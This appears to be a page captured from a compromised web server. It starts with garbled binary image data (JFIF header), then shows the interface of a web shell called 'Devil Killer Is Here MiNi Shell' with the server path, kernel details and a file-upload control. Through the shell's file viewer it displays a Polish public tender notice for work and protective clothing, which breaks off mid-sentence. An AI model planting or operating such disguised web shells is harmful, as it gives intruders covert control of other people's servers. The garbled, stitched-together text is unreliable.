JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251030/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20251030/0050686601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa odzieży roboczej i ochronnej dla pracowników Miejskiego Zakładu Komunalnego Sp. z o.o. z siedzibą w Stalowej Woli </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI ZAKŁAD KOMUNALNY SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830036219</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Komunalna 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stalowa Wola</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-450</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 15 842-34-11</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 15 842-19-50</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@mzk.stalowa-wola.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.mzk.stalowa-wola.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa odzieży roboczej i ochronnej dla pracowników Miejskiego Zakładu Komunalnego Sp. z o.o. z siedzibą w Stalowej Woli </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-97a3981f-d4c4-483e-8375-9be389efed06</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00506866</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mzk-stalowawola.ezamawiajacy.pl/pn/MZK-SW/demand/243727/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mzk-stalowawola.ezamawiajacy.pl/pn/MZK-SW/demand/243727/notice/public/details</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca, który zamierza wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca&#34; na Platformie eZamawiający. Wykonawca zakłada konto na stronie https://oneplace.marketplanet.pl<br/>Szczegółowe informacje dotyczące funkcjonowania Platformy zakupowej, w tym zakładanie konta, znajdują się w Instrukcji obsługi Platformy, która znajduje się w zakładce BAZA WIEDZY na subdomenie Zamawiającego: https://mzk-stalowawola.ezamawiajacy.pl.<br/>Istnieje możliwość zadania pytania przez Wykonawcę bez logowania na Platformie-należy wyszukać postępowanie w zakładce: „Lista postępowań PZP/aktualne” i skorzystać z opcji „Zadaj pytanie”. Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Zamawiającego: https://mzk-stalowawola.ezamawiajacy.pl lub https://oneplace.marketplanet.pl Wykonawca po zalogowaniu ma możliwość złożenia, wycofania oferty, a także dostęp do formularza do komunikacji. Ofertę należy sporządzić w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej, opatrzonej podpisem zaufanym lub podpisem osobistym. Informacje dot. podpisu kwalifikowanego, podpisu zaufanego i podpisu osobistego:<br/>1/usługa kwalifikowanego podpisu elektronicznego oraz warunki jej użycia można znaleźć na stronach internetowych kwalifikowanych dostawców usług zaufania, których lista znajduje się pod adresem internetowym: https://www.nccert.pl/index.htm.<br/>2/ profil zaufany- można znaleźć pod adresem internetowym: https://www.gov.pl/web/gov/zaloz-profil-zaufany.<br/>3/ podpis osobisty- można znaleźć pod adresem internetowym: https://www.gov.pl/web/e-dowod/podpisosobisty.<br/>Informacje dot. wymagań technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej zostały opisane w rozdziale XIV SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje zawarto w rozdziale XXV SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje zawarto w rozdziale XXV SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.Pzp.14.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 - Odzież o podwyższonej widoczności i firmowa dla pracowników Miejskiego Zakładu Komunalnego Sp. z o.o. z siedzibą w Stalowej Woli. Szczegółowy opis przedmiotu zamówienia określający parametry i wymagania dla przedmiotu zamówienia, bądź ich maksymalne lub minimalne parametry lub inne niezbędne cechy zawiera Załącznik Nr 8.1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">18130000-9 - Specjalna odzież robocza</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">35113400-3 - Odzież ochronna i zabezpieczająca</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji:<br/>1. Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w ramach realizacji przedmiotu zamówienia. W przypadku nieskorzystania przez Zamawiającego z prawa opcji Wykonawcy<br/>nie przysługują żadne roszczenia z tego tytułu.<br/>2. Przewidując prawo opcji Zamawiający przyznaje sobie prawo do zwiększenia zamówienia do 20% po cenach zaoferowanych w formularzu ofertowym na dostawę przedmiotu zamówienia. Zamawiający będzie korzystał z prawa opcji w<br/>przypadku wykorzystania środków objętych zamówieniem podstawowym (100% wartości przedmiotu zamówienia) lub wraz z ewentualnym rosnącym zapotrzebowaniem Zamawiającego.<br/>3. Zamawiający może skorzystać z prawa opcji w całości lub części; w przypadku skorzystania z prawa opcji w części, zamawiający może realizować prawo opcji wielokrotnie do wyczerpania się limitu na skorzystanie z prawa.<br/>4. Zamawiający będzie korzystał z prawa opcji wynikającego z jego aktualnych potrzeb, w różnych terminach w ciągu 12 miesięcy od dnia zawarcia umowy.<br/>5. Zamawiający w projektowanych postanowieniach umowy przewiduje możliwość aneksowania terminu realizacji umowy w przypadku niewykorzystania przez Zamawiającego zakresu rzeczowego i finansowego umowy (łącznie z opcją). <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert w oparciu o kryteria: Cena- waga 60%, Jakość- waga 40%. Punkty zostaną przyznane odrębnie dla każdego kryterium. Maksymalna liczba przyznanych punktów w kryterium Cena wynosi 60, zaś w kryterium Jakość wynosi 40. Łączna liczba punktów jaką można uzyskać w ocenie ofert, z uwzględnieniem kryteriów oceny, wynosi 100 punktów. Punkty zostaną przyznane zgodnie z zasadami opisanymi w rozdziale XIX SWZ. Oferta, która przedstawia najkorzystniejszy bilans (najwyższa liczba przyznanych punktów w oparciu o ustalone kryteria) zostanie uznana za najkorzystniejszą, pozostałe zaś zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą ilość punktów. Ocenie punktowej zostaną poddane oferty Wykonawców, którzy nie podlegają wykluczeniu, a ich oferty nie zostały odrzucone.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 - Odzież robocza i ochronna dla pracowników Miejskiego Zakładu Komunalnego Sp. z o.o. z siedzibą w Stalowej Woli. Szczegółowy opis przedmiotu zamówienia określający parametry i wymagania dla przedmiotu zamówienia, bądź ich maksymalne lub minimalne parametry lub inne niezbędne cechy zawiera Załącznik Nr 8.2 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">18130000-9 - Specjalna odzież robocza</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">35113400-3 - Odzież ochronna i zabezpieczająca</p> <p class="mb-0">18140000-2 - Dodatki do odzieży roboczej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji:<br/>1. Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w ramach realizacji przedmiotu zamówienia. W przypadku nieskorzystania przez Zamawiającego z prawa opcji Wykonawcy<br/>nie przysługują żadne roszczenia z tego tytułu.<br/>2. Przewidując prawo opcji Zamawiający przyznaje sobie prawo do zwiększenia zamówienia do 20% po cenach zaoferowanych w formularzu ofertowym na dostawę przedmiotu zamówienia. Zamawiający będzie korzystał z prawa opcji w<br/>przypadku wykorzystania środków objętych zamówieniem podstawowym (100% wartości przedmiotu zamówienia) lub wraz z ewentualnym rosnącym zapotrzebowaniem Zamawiającego.<br/>3. Zamawiający może skorzystać z prawa opcji w całości lub części; w przypadku skorzystania z prawa opcji w części, zamawiający może realizować prawo opcji wielokrotnie do wyczerpania się limitu na skorzystanie z prawa.<br/>4. Zamawiający będzie korzystał z prawa opcji wynikającego z jego aktualnych potrzeb, w różnych terminach w ciągu 12 miesięcy od dnia zawarcia umowy.<br/>5. Zamawiający w projektowanych postanowieniach umowy przewiduje możliwość aneksowania terminu realizacji umowy w przypadku niewykorzystania przez Zamawiającego zakresu rzeczowego i finansowego umowy (łącznie z opcją). <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert w oparciu o kryteria: Cena- waga 60%, Jakość- waga 40%. Punkty zostaną przyznane odrębnie dla każdego kryterium. Maksymalna liczba przyznanych punktów w kryterium Cena wynosi 60, zaś w kryterium Jakość wynosi 40. Łączna liczba punktów jaką można uzyskać w ocenie ofert, z uwzględnieniem kryteriów oceny, wynosi 100 punktów. Punkty zostaną przyznane zgodnie z zasadami opisanymi w rozdziale XIX SWZ. Oferta, która przedstawia najkorzystniejszy bilans (najwyższa liczba przyznanych punktów w oparciu o ustalone kryteria) zostanie uznana za najkorzystniejszą, pozostałe zaś zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą ilość punktów. Ocenie punktowej zostaną poddane oferty Wykonawców, którzy nie podlegają wykluczeniu, a ich oferty nie zostały odrzucone.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający stawia warunki w zakresie zdolności technicznej i zawodowej dot. Wykonawcy. Zamawiający precyzuje warunek doświadczenia:<br/>Wykonawca posiada doświadczenie, tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie (w przypadku świadczeń powtarzających się lub ciągłych również wykonuje należycie) co najmniej 1 zadanie polegające na dostawie odzieży o wartości co najmniej:<br/>- dla części 1 - 180 000,00 zł netto,<br/>- dla części 2 - 70 000,00 zł netto,<br/>Pod pojęciem usługi wykonanej należy rozumieć usługę zrealizowaną (zakończoną) w okresie ostatnich trzech lat przed upływem terminu składania ofert.<br/>Niedopuszczalne jest łączenie elementów/zakresów tegoż warunku w ramach doświadczenia posiadanego przez poszczególnych Wykonawców wspólnie ubiegających się o udzielenie zamówienia - celem wykazania spełniania warunku<br/>udziału w postępowaniu w całości.<br/>W przypadku wykazywania przez jednego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia doświadczenia w pracach/części prac z innym podmiotem - dla wykazania doświadczenia. Zamawiający dopuszcza tylko to doświadczenie tegoż Wykonawcy, które wynika z jego faktycznego udziału w danym zakresie zamówienia. W przypadku złożenia przez Wykonawcę dokumentu/oświadczenia na potwierdzenie warunków udziału w postępowaniu, z<br/>którego będą wynikać kwoty wyrażone w innej walucie niż PLN, Zamawiający dokona przeliczenia na PLN wg średniego kursu Narodowego Banku Polskiego z dnia, w którym opublikowano ogłoszenie o zamówieniu. Jeżeli dniem publikacji<br/>ogłoszenia będzie sobota lub dzień wolny od pracy, wówczas jako kurs przeliczeniowy waluty Zamawiający przyjmie średni kurs Narodowego Banku Polskiego z pierwszego dnia roboczego po dniu publikacji ogłoszenia o zamówieniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty, wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym, nie krótszym niż 5 dni terminie, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1) Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy PZP sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia i dokumenty, o których mowa w pkt 1powyżej, składa każdy z Wykonawców.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument, składa każdy z Wykonawców/Podmiot udostępniający zasoby.<br/>2) Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP, w zakresie podstaw wykluczenia z postępowania, o których mowa w art. 108 ust. 1 pkt 3-6 oraz art. 109 ust. 1 pkt 5,7,8 i 10 ustawy PZP, a także w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2024 r. poz. 507); wzór oświadczenia stanowi Załącznik nr 10 do SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument, składa każdy z Wykonawców/Podmiot udostępniający zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty, wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym, nie krótszym niż 5 dni terminie, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1) Wykazu dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; wzór Wykazu dostaw stanowi Załącznik nr 6 do 